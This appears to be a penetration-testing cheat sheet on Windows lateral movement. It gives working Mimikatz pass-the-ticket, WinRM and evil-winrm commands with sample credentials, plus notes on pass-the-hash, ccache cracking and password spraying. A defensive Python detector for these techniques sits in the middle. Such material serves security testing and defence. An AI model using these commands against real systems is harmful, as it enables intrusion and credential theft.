Lateral Movement

There aren't many ways to move laterally on Windows. Below are the main ones.

  • psexec

  • RDP

  • WinRM

  • SSH (not likely)

PTH (pass the hash) can be used most of the time.

Mimikatz Ticket PTT

# Enable remoting locally, inject the ticket, then open a session on the target
Enable-PSRemoting
mimikatz.exe "kerberos::ptt C:\Users\Public\ticketname.kirbi" "exit"
Enter-PSSession -ComputerName ECORP

WinRM

$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }

# Evil-WinRM
https://github.com/Hackplayers/evil-winrm
ruby evil-winrm.rb -i 192.168.1.2 -u morph3 -p morph3 -r evil.corp

PTH with Mimikatz

Pass The Ccache (PTC)

Grab the ccache from the remote host and point an environment variable at it.

Make sure the clock is synced with the DC (Kerberos rejects tickets when the skew is too large).

Psexec to the target.

** Don't include the domain name in psexec. If you are having issues with the command, you may remove the username as well.
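As a defender's counterpart to the psexec, WinRM and pass-the-hash entries above, here is an added example (not from the original cheat sheet) that runs simple heuristics over Windows event records. The field names follow the Security/System event log schema; the hosts, users, IPs and records themselves are constructed, and the rules are heuristics that need tuning against a baseline.

```python
"""Heuristic detection of PsExec, WinRM and pass-the-hash lateral movement over
Windows event records. Sample records below are constructed, not real telemetry."""

# 4624/4688 come from the Security log, 7045 (service installed) from the System log.
SAMPLE_EVENTS = [
    # pass-the-hash against a file server: network logon, NTLM, empty session key
    {"EventID": 4624, "Computer": "FILES01", "LogonType": "3",
     "AuthenticationPackageName": "NTLM", "LogonProcessName": "NtLmSsp",
     "KeyLength": "0", "TargetUserName": "morph3", "IpAddress": "10.0.0.5"},
    # ordinary NTLM network logon with a 128-bit session key: must not fire
    {"EventID": 4624, "Computer": "FILES01", "LogonType": "3",
     "AuthenticationPackageName": "NTLM", "LogonProcessName": "NtLmSsp",
     "KeyLength": "128", "TargetUserName": "alice", "IpAddress": "10.0.0.9"},
    # PsExec installing its service on the target
    {"EventID": 7045, "Computer": "FILES01", "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    # WinRM spawning the remote session host for an incoming Enter-PSSession
    {"EventID": 4688, "Computer": "DC", "SubjectUserName": "morph3",
     "NewProcessName": "C:\\Windows\\System32\\wsmprovhost.exe"},
]

def classify(ev):
    """Return a label when the event matches a lateral-movement heuristic, else None."""
    eid = ev.get("EventID")
    if (eid == 4624 and ev.get("LogonType") == "3"
            and ev.get("AuthenticationPackageName") == "NTLM"
            and ev.get("KeyLength") == "0"):
        # NTLM network logon with KeyLength 0 is a common PtH tell; treat as a lead, not proof
        return "possible_pass_the_hash"
    svc = (ev.get("ServiceName", "") + ev.get("ImagePath", "")).upper()
    if eid == 7045 and "PSEXESVC" in svc:
        return "psexec_service_install"
    if eid == 4688 and ev.get("NewProcessName", "").lower().endswith("wsmprovhost.exe"):
        return "winrm_remote_session"
    return None

def detect(events):
    """Group hits per host as (label, event) pairs; hosts with no hits are omitted."""
    hits = {}
    for ev in events:
        label = classify(ev)
        if label:
            hits.setdefault(ev["Computer"], []).append((label, ev))
    return hits

if __name__ == "__main__":
    for host, found in detect(SAMPLE_EVENTS).items():
        for label, ev in found:
            print(f"{host}: {label} (EventID {ev['EventID']})")
```

Correlating a 4624 NTLM hit with a 7045 PSEXESVC install on the same host within a short window is a much stronger signal than either alone.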

Cracking Ccache

Convert the ccache file into a kirbi file using a converter.

Convert the kirbi file into a crackable hash.

RDP

Impacket's rdp_check.py script is good.

CrackMapExec

Swiss-army-knife tool for password spraying.
